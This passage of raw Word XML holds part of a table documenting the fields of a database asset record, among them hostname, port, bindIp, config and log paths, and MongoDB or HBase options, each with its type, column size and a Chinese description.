          <w:p w14:paraId="15DF7AF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D5A376F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="105D9F52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B5CA27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4319314E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38854FFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09925D05" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390D82B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="565C0416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2315B1E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1256088A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B565B33" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0735D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A9A60A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2153B02A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229A0FA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0715B36A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF5607D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02834E4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025F2D2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1854C4FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="072705E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66909A61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="547F5DB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353AFB04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32BC9182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46EAAEF9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F19B140" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B1D1A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC48847" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DACBD65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02EC0234" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344753C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F660AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BC30CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66A92B38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00DE641D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="331D25DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protoType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00423FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="089520B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C13DBA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DECD260" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB3578B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71325360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B57433" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="763798C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30E5DE65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="114F7CD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31747D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF4D3FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37757A69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CFDBF2B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D9190C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>confPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="546BCBBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467389A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59744812" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3926D169" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9BAC4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>logPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282D5A4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EEDA6B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E20BE07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>日志文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18CAAD6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="213C6BD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dataDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2601972F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2611A085" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D47DBDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07F61AD3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="326B8636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pluginDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6208A320" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0066F6D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09186562" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>插件目录,仅Linux MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38431913" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076FD7AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B1D9EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A021004" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C2D131E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开放rest:'true';'false',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="397D2371" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0125CA11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C5B1B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383E79AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FCE5419" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启安全认证:'enabled'; 'disabled',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2695D3D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C57028" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016C7AAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39AA6DDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A451079" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启web接口:'true'; 'false',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B1967DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CEBB4F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59896E58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085B1C49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A58C8BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web界面端口,仅Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="181CB92B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B1FFB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>webAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FAB1FEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F41C17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E66E27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web界面地址,仅Oracle以及Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="321DB04E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F868C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regionServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D8A967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E7D213" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7672EDE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>region server列表,仅Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F117838" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38015DB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>dbName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
